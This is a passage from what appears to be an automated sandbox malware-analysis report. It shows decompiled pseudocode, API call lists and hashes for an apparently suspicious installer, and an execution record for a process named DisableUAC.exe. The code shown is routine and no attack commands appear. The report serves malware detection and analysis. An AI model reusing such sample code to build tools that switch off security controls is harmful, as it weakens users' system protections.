								 *(__ebp - 0x34) = E0040596A(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E0040596A(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x00401ec7
0x00401ecf
0x00401ed4
0x00401ed9
0x00401edd
0x00401ee0
0x00401ee2
0x00401ee9
0x00401ef2
0x00401efa
0x00401efd
0x00401f12
0x00401f18
0x00401f2b
0x00401f34
0x00401f40
0x00401f45
0x00401f45
0x00401f2b
0x00401f48
0x00401b75
0x00401b75
0x00401efd
0x0040288e
0x0040289a

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24

Part of subcall function 0040596A: wsprintfA.USER32 ref: 00405977

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 099a0aa409c47306a0e5e8436e4e2e7c61bc24b53b401cebe12c2d8cce08dfb0
Instruction ID: ac83c8b0d38e5b491d5bd27050ffdb4091974a4b49ad9b19d675067d3fb65d11
Opcode Fuzzy Hash: 099a0aa409c47306a0e5e8436e4e2e7c61bc24b53b401cebe12c2d8cce08dfb0
Instruction Fuzzy Hash: 201148B2900108BFDB01EFA5D981DAEBBB9EF04344B24807AF505F61E1D7389A54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00405593 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405593(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405345
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E0040552A(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}

0x0040559c
0x0040559c
0x004055a3
0x004055a6
0x004055ab
0x004055be
0x004055d8
0x00000000
0x004055d8
0x004055c2
0x004055c3
0x004055c6
0x004055c7
0x004055cf
0x00000000
0x00000000
0x004055d1
0x004055d4
0x00000000
0x00000000
0x00000000
0x004055d4
0x00000000
0x004055b4
0x00000000
0x004055b5

APIs

CharNextA.USER32(ES@,?,0042B3E8,00000000,004055F7,0042B3E8,0042B3E8,?,?,00000000,00405345,?,"C:\Users\user\Desktop\file.exe",00000000), ref: 004055A1
CharNextA.USER32(00000000), ref: 004055A6
CharNextA.USER32(00000000), ref: 004055B5

Strings

ES@, xrefs: 0040559C, 004055A0

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CharNext
String ID: ES@
API String ID: 3213498283-1851447614
Opcode ID: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
Instruction ID: f60ec20427defc95a9886ae099bd540e39d30c8fbbaad3333d1940da6ed1a81e
Opcode Fuzzy Hash: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
Instruction Fuzzy Hash: F8F0A7A2D44B25B6E73222A84C44B6B6BADDB55711F244437E200B61D597B84C828FBA

Uniqueness

Uniqueness Score: -1.00%

Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af84->lfHeight =  ~(MulDiv(E004029D9(2), _t6, 0x48));
				 *0x40af94 = E004029D9(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af9b = 1;
				 *0x40af98 = _t11 & 0x00000001;
				 *0x40af99 = _t11 & 0x00000002;
				 *0x40af9a = _t11 & 0x00000004;
				E00405A2E(_t18, _t24, _t26, 0x40afa0,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af84);
				_push(_t14);
				_push(_t26);
				E0040596A();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d29
0x00401d42
0x00401d4c
0x00401d51
0x00401d5c
0x00401d63
0x00401d75
0x00401d7b
0x00401d80
0x00401d8a
0x004024b8
0x00401561
0x00402833
0x0040288e
0x0040289a

APIs

GetDC.USER32(?), ref: 00401D22
GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
CreateFontIndirectA.GDI32(0040AF84), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: bbbcfc34ac2d637fe9c3dcd2aae23fbeb0c3268bdde6826654245cc777324362
Instruction ID: 580b179190550232f88f4ba5e52f5296c98f8c4b0afe68c870f47754878f2485
Opcode Fuzzy Hash: bbbcfc34ac2d637fe9c3dcd2aae23fbeb0c3268bdde6826654245cc777324362
Instruction Fuzzy Hash: 68F044F1A45342AEE702A7B0AE4B7993B649725309F100436F545BA1E2C5BC00149B7F

Uniqueness

Uniqueness Score: -1.00%

Function 00402BBE Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BBE(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x420b88; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42eb6c;
						if(_t2 >  *0x42eb6c) {
							_t3 = CreateDialogParamA( *0x42eb60, 0x6f, 0, E00402B3B, 0);
							 *0x420b88 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405D67(0);
					}
				} else {
					_t6 =  *0x420b88; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420b88 = 0;
					return _t6;
				}
			}

0x00402bc5
0x00402bdf
0x00402be5
0x00402bef
0x00402bf5
0x00402bfb
0x00402c0c
0x00402c15
0x00000000
0x00402c1a
0x00402c21
0x00402be7
0x00402bee
0x00402bee
0x00402bc7
0x00402bc7
0x00402bce
0x00402bd1
0x00402bd1
0x00402bd7
0x00402bde
0x00402bde

APIs

DestroyWindow.USER32(00000000,00000000,00402D9E,00000001), ref: 00402BD1
GetTickCount.KERNEL32 ref: 00402BEF
CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C0C
ShowWindow.USER32(00000000,00000005), ref: 00402C1A

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: c87a5157f8204693ca179b822d2a85440fc20d6be017f85e77c31dbe1d2c93c5
Instruction ID: df45f881ccb5ca36463c1a09230da8cf23750fca8468dec1cd15007da7f5e5e8
Opcode Fuzzy Hash: c87a5157f8204693ca179b822d2a85440fc20d6be017f85e77c31dbe1d2c93c5
Instruction Fuzzy Hash: 22F0F430A09120EBC6716F95FD4C99B7F64E704B157504437F001B55F5D67878829B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040381E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040381E(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1049";
				_t13 = 0xffff;
				_t6 = E00405983(__ecx, "1049");
				while(1) {
					_t26 =  *0x42eba4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x42eb70 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42eba0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42e340 = _t18[1];
					 *0x42ec08 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42e33c = _t23;
						E0040596A(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x429fb8, E00405A2E(_t13, _t24, _t26, 0x42e360, 0xfffffffe));
						_t11 =  *0x42eb8c;
						_t27 =  *0x42eb88;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405A2E(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x00403822
0x00403827
0x0040382d
0x00403832
0x00403832
0x0040383a
0x00000000
0x00000000
0x00403842
0x0040384a
0x0040384c
0x00403852
0x00403852
0x00403854
0x00403860
0x00000000
0x00000000
0x00403864
0x00000000
0x00000000
0x00000000
0x00403866
0x0040386b
0x00403874
0x0040387a
0x0040387f
0x00403893
0x0040389e
0x004038b6
0x004038bc
0x004038c1
0x004038c9
0x004038ea
0x004038ea
0x004038ea
0x004038cb
0x004038cd
0x004038cd
0x004038d1
0x004038d8
0x004038d8
0x004038dd
0x004038e3
0x004038e3
0x00000000
0x004038cd
0x00403881
0x00403886
0x0040388f
0x00403888
0x00403888
0x00403888
0x00403886

APIs

SetWindowTextA.USER32(00000000,0042E360), ref: 004038B6

Strings

1049, xrefs: 00403822, 0040382C, 0040389D
C:\Users\user\AppData\Local\Temp\, xrefs: 0040381F

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: TextWindow
String ID: 1049$C:\Users\user\AppData\Local\Temp\
API String ID: 530164218-4112380293
Opcode ID: 48b09981901e30c4345b6e5c0cee300cf490ae76efe8ca9e2f713c31fa19992d
Instruction ID: f58d08b88b77c55e92e539ad5181c9965f6bbcffbd0d008a8b371c472e4a47a6
Opcode Fuzzy Hash: 48b09981901e30c4345b6e5c0cee300cf490ae76efe8ca9e2f713c31fa19992d
Instruction Fuzzy Hash: 9311D176B001009BC734EF56DC809737BADEB8471636881BFEC02A7390D639A8038A98

Uniqueness

Uniqueness Score: -1.00%

Function 00404CFA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404CFA(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x429fc8 != _t22) {
							 *0x429fc8 = _t22;
							E00405A0C(0x429fe0, 0x42f000);
							E0040596A(0x42f000, _t22);
							E0040140B(6);
							E00405A0C(0x42f000, 0x429fe0);
						}
						L11:
						return CallWindowProcA( *0x429fd0, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404679(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403E0A(0x413);
				return 0;
			}

0x00404d06
0x00404d2b
0x00404d4b
0x00404d4e
0x00404d51
0x00404d68
0x00404d6e
0x00404d75
0x00404d7c
0x00404d83
0x00404d88
0x00404d8e
0x00000000
0x00404d9e
0x00404d38
0x00404d8b
0x00404d8b
0x00000000
0x00404d8b
0x00404d44
0x00404d46
0x00000000
0x00404d46
0x00404d0c
0x00000000
0x00000000
0x00404d13
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00404D30
CallWindowProcA.USER32 ref: 00404D9E

Part of subcall function 00403E0A: SendMessageA.USER32 ref: 00403E1C

Strings

, xrefs: 00404D08

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 498d22ec92de87507460055f31d3341dd140a7d0c04a54d74523ea2b6bf50dd0
Instruction ID: b16bf2df46199d4e0f4b20eb531931f7d117dfa55111be6f57691eac5a9fa7e0
Opcode Fuzzy Hash: 498d22ec92de87507460055f31d3341dd140a7d0c04a54d74523ea2b6bf50dd0
Instruction Fuzzy Hash: 25114F71600218BBDB219F52DC41AAB3B69AF84365F00813FFA04B91E1C37D8D51CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004034C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034C0() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x428f9c;
				_t3 = E004034A5(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x428f9c =  *0x428f9c & 0x00000000;
				return _t3;
			}

0x004034c1
0x004034c9
0x004034d0
0x004034d3
0x004034d3
0x004034d5
0x004034da
0x004034e1
0x004034e7
0x004034eb
0x004034ec
0x004034f4

APIs

FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\file.exe",00000000,00000000,00403498,004032EB,00000000), ref: 004034DA
GlobalFree.KERNEL32 ref: 004034E1

Strings

"C:\Users\user\Desktop\file.exe", xrefs: 004034D2

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: "C:\Users\user\Desktop\file.exe"
API String ID: 1100898210-2704909572
Opcode ID: 46acf84ebda6383aa3704241e203cd439e3c816428f1e63aa7a51627b246d5e2
Instruction ID: a7ab284cabc648ba81e11ba063b903b3b671d5f7e61a69f5101281db245b6d62
Opcode Fuzzy Hash: 46acf84ebda6383aa3704241e203cd439e3c816428f1e63aa7a51627b246d5e2
Instruction Fuzzy Hash: E1E08C329110209BD6221F05AE0575A7B6D6B44B32F02802AE9407B2A087746C424BDD

Uniqueness

Uniqueness Score: -1.00%

Function 00405546 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405546(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405547
0x00405551
0x00405553
0x0040555a
0x00405562
0x00000000
0x00000000
0x00000000
0x00405562
0x00405564
0x00405569

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\file.exe,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 0040554C
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C8E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\file.exe,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 0040555A

Strings

C:\Users\user\Desktop, xrefs: 00405546

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1669384263
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: fca702df0190f5d4796b13fce4c8f5ccfdab60c3fa8ed772e71c257c4247ae30
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: 39D0A772508EB07EE70366149C00B9F7A88CF13340F094462E040A61D4C27C4D418FFD

Uniqueness

Uniqueness Score: -1.00%

Function 00405658 Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405658(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x00405664
0x00405666
0x0040568e
0x00405673
0x00405678
0x00405683
0x00000000
0x004056a0
0x0040568c
0x0040568c
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565F
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405678
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405686
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040568F

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: fee4d645b7b415a6dc1afaac75e8b1817c7eae67fc86a6e8a33b60f3285d70db
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: 05F0A736309D519AC2125B295C04A6F6A98EF91314B58097AF444F2140E33A9C119BBF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: DisableUAC.exePID: 7140, Parent PID: 5724COMMON

Execution Graph

Execution Coverage:	14.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.4%
Total number of Nodes:	1356
Total number of Limit Nodes:	25

Executed Functions

Function 000000014000A15C Relevance: 57.3, APIs: 38, Instructions: 334
stringmemorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 000000014000A1D1
CreatePipe.KERNEL32 ref: 000000014000A23D
CreatePipe.KERNEL32 ref: 000000014000A294
CreatePipe.KERNEL32 ref: 000000014000A2D9
GetStdHandle.KERNEL32 ref: 000000014000A314
GetStdHandle.KERNEL32 ref: 000000014000A329
GetStdHandle.KERNEL32 ref: 000000014000A33E
strlen.MSVCRT ref: 000000014000A371
strlen.MSVCRT ref: 000000014000A37C
HeapAlloc.KERNEL32 ref: 000000014000A38F
strcpy.MSVCRT ref: 000000014000A3A7
strcat.MSVCRT ref: 000000014000A3B2
strcat.MSVCRT ref: 000000014000A3C1
strcat.MSVCRT ref: 000000014000A3E6
strcat.MSVCRT ref: 000000014000A3F1
CreateProcessA.KERNEL32 ref: 000000014000A43C
CloseHandle.KERNEL32 ref: 000000014000A456
CloseHandle.KERNEL32 ref: 000000014000A466
CloseHandle.KERNEL32 ref: 000000014000A476
CloseHandle.KERNEL32 ref: 000000014000A480
WaitForSingleObject.KERNEL32 ref: 000000014000A493
EnterCriticalSection.KERNEL32 ref: 000000014000A4A8
LeaveCriticalSection.KERNEL32 ref: 000000014000A4C9
CloseHandle.KERNEL32 ref: 000000014000A50E
CloseHandle.KERNEL32 ref: 000000014000A51E
CloseHandle.KERNEL32 ref: 000000014000A52E
CloseHandle.KERNEL32 ref: 000000014000A53E
CloseHandle.KERNEL32 ref: 000000014000A54E
CloseHandle.KERNEL32 ref: 000000014000A55E
strlen.MSVCRT ref: 000000014000A576
strcpy.MSVCRT ref: 000000014000A59D
memset.MSVCRT ref: 000000014000A5BB
ShellExecuteExA.SHELL32 ref: 000000014000A5EC
WaitForSingleObject.KERNEL32 ref: 000000014000A60A
EnterCriticalSection.KERNEL32 ref: 000000014000A61F
LeaveCriticalSection.KERNEL32 ref: 000000014000A640

Part of subcall function 000000014000A0F8: GetCurrentProcess.KERNEL32 ref: 000000014000A105
Part of subcall function 000000014000A0F8: GetCurrentProcess.KERNEL32 ref: 000000014000A10E
Part of subcall function 000000014000A0F8: DuplicateHandle.KERNEL32 ref: 000000014000A134
Part of subcall function 000000014000A0F8: CloseHandle.KERNEL32 ref: 000000014000A141

CloseHandle.KERNEL32 ref: 000000014000A670
HeapFree.KERNEL32 ref: 000000014000A687

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

